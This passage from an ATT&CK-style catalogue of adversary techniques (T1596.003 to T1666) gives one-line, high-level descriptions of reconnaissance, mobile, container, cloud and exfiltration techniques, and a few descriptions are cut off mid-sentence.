Search Open Technical Databases: Digital Certificates (T1596.003)

Adversaries may search public digital certificate data for information about victims that can be used during targeting.

Search Open Technical Databases: CDNs (T1596.004)

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting.

Search Open Technical Databases: Scan Databases (T1596.005)

Adversaries may search within public scan databases for information about victims that can be used during targeting.

Search Closed Sources (T1597)

Adversaries may search and gather information about victims from closed (e.

Search Closed Sources: Threat Intel Vendors (T1597.001)

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting.

Search Closed Sources: Purchase Technical Data (T1597.002)

Adversaries may purchase technical information about victims that can be used during targeting.

Phishing for Information (T1598)

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting.

Phishing for Information: Spearphishing Service (T1598.001)

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting.

Phishing for Information: Spearphishing Attachment (T1598.002)

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting.

Phishing for Information: Spearphishing Link (T1598.003)

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting.

Phishing for Information: Spearphishing Voice (T1598.004)

Adversaries may use voice communications to elicit sensitive information that can be used during targeting.

Network Boundary Bridging (T1599)

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation.

Network Boundary Bridging: Network Address Translation Traversal (T1599.001)

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration.

Weaken Encryption (T1600)

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications.

Weaken Encryption: Reduce Key Space (T1600.001)

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.

Weaken Encryption: Disable Crypto Hardware (T1600.002)

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Modify System Image (T1601)

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.

Modify System Image: Patch System Image (T1601.001)

Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.

Modify System Image: Downgrade System Image (T1601.002)

Adversaries may install an older version of the operating system of a network device to weaken security.

Data from Configuration Repository (T1602)

Adversaries may collect data related to managed devices from configuration repositories.

Data from Configuration Repository: SNMP (MIB Dump) (T1602.001)

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

Data from Configuration Repository: Network Device Configuration Dump (T1602.002)

Adversaries may access network configuration files to collect sensitive data about the device and the network.

Scheduled Task/Job (T1603)

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

Proxy Through Victim (T1604)

Adversaries may use a compromised device as a proxy server to the Internet.

Command-Line Interface (T1605)

Adversaries may use built-in command-line interfaces to interact with the device and execute commands.

Forge Web Credentials (T1606)

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services.

Forge Web Credentials: Web Cookies (T1606.001)

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services.

Forge Web Credentials: SAML Tokens (T1606.002)

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.

Stage Capabilities (T1608)

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting.

Stage Capabilities: Upload Malware (T1608.001)

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting.

Stage Capabilities: Upload Tool (T1608.002)

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting.

Stage Capabilities: Install Digital Certificate (T1608.003)

Adversaries may install SSL/TLS certificates that can be used during targeting.

Stage Capabilities: Drive-by Target (T1608.004)

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing.

Stage Capabilities: Link Target (T1608.005)

Adversaries may put in place resources that are referenced by a link that can be used during targeting.

Stage Capabilities: SEO Poisoning (T1608.006)

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims.

Container Administration Command (T1609)

Adversaries may abuse a container administration service to execute commands within a container.

Deploy Container (T1610)

Adversaries may deploy a container into an environment to facilitate execution or evade defenses.

Escape to Host (T1611)

Adversaries may break out of a container to gain access to the underlying host.

Build Image on Host (T1612)

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry.

Container and Resource Discovery (T1613)

Adversaries may attempt to discover containers and other resources that are available within a containers environment.

System Location Discovery (T1614)

Adversaries may gather information in an attempt to calculate the geographical location of a victim host.

System Location Discovery: System Language Discovery (T1614.001)

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

Group Policy Discovery (T1615)

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.

Call Control (T1616)

Adversaries may make, forward, or block phone calls without user authorization.

Hooking (T1617)

Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection.

User Evasion (T1618)

Adversaries may attempt to avoid detection by hiding malicious behavior from the user.

Cloud Storage Object Discovery (T1619)

Adversaries may enumerate objects in cloud storage infrastructure.

Reflective Code Loading (T1620)

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.

Multi-Factor Authentication Request Generation (T1621)

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Debugger Evasion (T1622)

Adversaries may employ various means to detect and avoid debuggers.

Command and Scripting Interpreter (T1623)

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.

Command and Scripting Interpreter: Unix Shell (T1623.001)

Adversaries may abuse Unix shell commands and scripts for execution.

Event Triggered Execution (T1624)

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events.

Event Triggered Execution: Broadcast Receivers (T1624.001)

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events.

Hijack Execution Flow (T1625)

Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications.

Hijack Execution Flow: System Runtime API Hijacking (T1625.001)

Adversaries may execute their own malicious payloads by hijacking the way an operating system runs applications.

Abuse Elevation Control Mechanism (T1626)

Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions.

Abuse Elevation Control Mechanism: Device Administrator Permissions (T1626.001)

Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device.

Execution Guardrails (T1627)

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target.

Execution Guardrails: Geofencing (T1627.001)

Adversaries may use a device’s geographical location to limit certain malicious behaviors.

Hide Artifacts (T1628)

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection.

Hide Artifacts: Suppress Application Icon (T1628.001)

A malicious application could suppress its icon from being displayed to the user in the application launcher.

Hide Artifacts: User Evasion (T1628.002)

Adversaries may attempt to avoid detection by hiding malicious behavior from the user.

Hide Artifacts: Conceal Multimedia Files (T1628.003)

Adversaries may attempt to hide multimedia files from the user.

Impair Defenses (T1629)

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.

Impair Defenses: Prevent Application Removal (T1629.001)

Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application.

Impair Defenses: Device Lockout (T1629.002)

An adversary may seek to inhibit user interaction by locking the legitimate user out of the device.

Impair Defenses: Disable or Modify Tools (T1629.003)

Adversaries may disable security tools to avoid potential detection of their tools and activities.

Indicator Removal on Host (T1630)

Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself.

Indicator Removal on Host: Uninstall Malicious Application (T1630.001)

Adversaries may include functionality in malware that uninstalls the malicious application from the device.

Indicator Removal on Host: File Deletion (T1630.002)

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity.

Indicator Removal on Host: Disguise Root/Jailbreak Indicators (T1630.003)

An adversary could use knowledge of the techniques used by security software to evade detection.

Process Injection (T1631)

Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges.

Process Injection: Ptrace System Calls (T1631.001)

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.

Subvert Trust Controls (T1632)

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications.

Subvert Trust Controls: Code Signing Policy Modification (T1632.001)

Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys.

Virtualization/Sandbox Evasion (T1633)

Adversaries may employ various means to detect and avoid virtualization and analysis environments.

Virtualization/Sandbox Evasion: System Checks (T1633.001)

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.

Credentials from Password Store (T1634)

Adversaries may search common password storage locations to obtain user credentials.

Credentials from Password Store: Keychain (T1634.001)

Adversaries may collect keychain data from an iOS device to acquire credentials.

Steal Application Access Token (T1635)

Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources.

Steal Application Access Token: URI Hijacking (T1635.001)

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Protected User Data (T1636)

Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list.

Protected User Data: Calendar Entries (T1636.001)

Adversaries may utilize standard operating system APIs to gather calendar entry data.

Protected User Data: Call Log (T1636.002)

Adversaries may utilize standard operating system APIs to gather call log data.

Protected User Data: Contact List (T1636.003)

Adversaries may utilize standard operating system APIs to gather contact list data.

Protected User Data: SMS Messages (T1636.004)

Adversaries may utilize standard operating system APIs to gather SMS messages.

Dynamic Resolution (T1637)

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations.

Dynamic Resolution: Domain Generation Algorithms (T1637.001)

Adversaries may use [Domain Generation Algorithms](https://attack.

Adversary-in-the-Middle (T1638)

Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.

Exfiltration Over Alternative Protocol (T1639)

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1639.001)

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Account Access Removal (T1640)

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.

Data Manipulation (T1641)

Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity.

Data Manipulation: Transmitted Data Manipulation (T1641.001)

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.

Endpoint Denial of Service (T1642)

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.

Generate Traffic from Victim (T1643)

Adversaries may generate outbound traffic from devices.

Out of Band Data (T1644)

Adversaries may communicate with compromised devices using out of band data streams.

Compromise Client Software Binary (T1645)

Adversaries may modify system software binaries to establish persistent access to devices.

Exfiltration Over C2 Channel (T1646)

Adversaries may steal data by exfiltrating it over an existing command and control channel.

Plist File Modification (T1647)

Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses.

Serverless Execution (T1648)

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments.

Steal or Forge Authentication Certificates (T1649)

Adversaries may steal or forge certificates used for authentication to access remote systems or resources.

Acquire Access (T1650)

Adversaries may purchase or otherwise acquire an existing access to a target system or network.

Cloud Administration Command (T1651)

Adversaries may abuse cloud management services to execute commands within virtual machines.

Device Driver Discovery (T1652)

Adversaries may attempt to enumerate local device drivers on a victim host.

Power Settings (T1653)

Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines.

Log Enumeration (T1654)

Adversaries may enumerate system and service logs to find useful data.

Masquerading (T1655)

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Masquerading: Match Legitimate Name or Location (T1655.001)

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.

Impersonation (T1656)

Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf.

Financial Theft (T1657)

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims.

Exploitation for Client Execution (T1658)

Adversaries may exploit software vulnerabilities in client applications to execute code.

Content Injection (T1659)

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic.

Phishing (T1660)

Adversaries may send malicious content to users in order to gain access to their mobile devices.

Application Versioning (T1661)

An adversary may push an update to a previously benign application to add malicious code.

Data Destruction (T1662)

Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources.

Remote Access Software (T1663)

Adversaries may use legitimate remote access software, such as `VNC`, `TeamViewer`, `AirDroid`, `AirMirror`, etc.

Exploitation for Initial Access (T1664)

Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.

Hide Infrastructure (T1665)

Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure.

Modify Cloud Resource Hierarchy (T1666)

Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.
